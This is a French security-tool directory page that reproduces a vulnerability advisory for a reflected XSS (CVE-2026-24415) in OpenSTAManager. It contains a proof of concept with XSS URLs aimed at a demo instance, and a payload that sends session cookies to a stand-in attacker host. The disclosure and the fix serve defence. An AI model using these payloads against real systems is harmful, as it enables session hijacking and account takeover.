Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter | Kitploit
Outils/GitHubGitHub/lukasz-rybak/cve-2026-24415
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24415 : OpenSTAManager affecté par une XSS dans modifica_iva.php via le paramètre righe

Vue d'ensemble

ChampDétails
Identifiant CVECVE-2026-24415
SévéritéMOYENNE
Avis de sécuritéConsulter l'avis
Découvert parLukasz Rybak

Produits concernés

  • devcode-it/openstamanager (versions : < 2.9.8)

Classification CWE

  • CWE-79 : Neutralisation incorrecte de l'entrée lors de la génération de pages Web (« Cross-site Scripting »)

Détails

Résumé

De multiples vulnérabilités de type Cross-Site Scripting (XSS) reflété dans OpenSTAManager v2.9.8 permettent à des attaquants non authentifiés d'exécuter du code JavaScript arbitraire dans le contexte du navigateur d'autres utilisateurs via des paramètres d'URL spécialement conçus, pouvant conduire au détournement de session, au vol d'identifiants et à des actions non autorisées.

Paramètre vulnérable : righe (GET)

Détails

OpenSTAManager v2.9.8 contient de multiples vulnérabilités de type XSS reflété dans les fenêtres modales de modification des factures/commandes/contrats. L'application ne filtre pas correctement l'entrée fournie par l'utilisateur via le paramètre GET righe avant de la refléter dans la sortie HTML.

Emplacement du code vulnérable : Fichier : /modules/contratti/modals/modifica_iva.php (Ligne 125)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

Le paramètre $_GET['righe'] est directement affiché dans l'attribut value HTML sans aucune neutralisation via htmlspecialchars() ou fonctions équivalentes. Cela permet à un attaquant de sortir du contexte de l'attribut et d'injecter du HTML/JavaScript arbitraire.

Tous les fichiers concernés :

  1. /modules/contratti/modals/modifica_iva.php - Ligne 125, Ligne 167
  2. /modules/preventivi/modals/modifica_iva.php - Ligne 125, Ligne 167
  3. /modules/fatture/modals/modifica_iva.php - Ligne 121, Ligne 161
  4. /modules/ddt/modals/modifica_iva.php - Ligne 125, Ligne 167
  5. /modules/ordini/modals/modifica_iva.php - Ligne 125, Ligne 167
  6. /modules/interventi/modals/modifica_iva.php - Ligne 125, Ligne 167

PoC

Prérequis :

  • Instance en cours d'exécution d'OpenSTAManager v2.9.8
  • Identifiants administrateur valides (nom d'utilisateur : admin, mot de passe : admin pour l'instance de test)

Étape 1 : Connexion

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Étape 2 : Déclencher la XSS Naviguez vers l'URL suivante dans un navigateur (ou utilisez curl avec les cookies) :

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

URL testées (toutes vulnérables) :

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

Résultat attendu : Une boîte de dialogue d'alerte JavaScript s'affiche montrant le cookie de session actuel, confirmant l'exécution du code.

Sortie HTML (vérifiée sur instance active) :

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

Vérification :

image image

Charges utiles alternatives : Vol de session : "><script>fetch('https://attaquant.com/?c='+document.cookie)</script>

Impact

Utilisateurs concernés : Tous les utilisateurs authentifiés ayant accès aux modules de contrats, factures, devis ou commandes.

Scénario d'attaque :

  1. L'attaquant crée une URL malveillante avec une charge utile XSS
  2. L'attaquant envoie l'URL à la victime par e-mail/chat/hameçonnage
  3. La victime (utilisateur authentifié) clique sur le lien
  4. Le code JavaScript malveillant s'exécute dans le contexte du navigateur de la victime
  5. L'attaquant peut :
    • Voler les cookies de session → prise de contrôle totale du compte
    • Effectuer des actions au nom de la victime (créer/modifier/supprimer des enregistrements)
    • Voler les jetons CSRF et contourner la protection CSRF
    • Rediriger vers une page d'hameçonnage
    • Injecter un enregistreur de frappe pour capturer des données sensibles
    • Modifier le contenu de la page pour inciter l'utilisateur à révéler ses identifiants

Correctif recommandé :

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

Appliquez ce correctif à tous les fichiers concernés listés dans la section Détails.

Références

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

Avertissement

Cette CVE a été divulguée de manière responsable conformément aux pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici sont à des fins éducatives et défensives uniquement.

Télécharger l’outil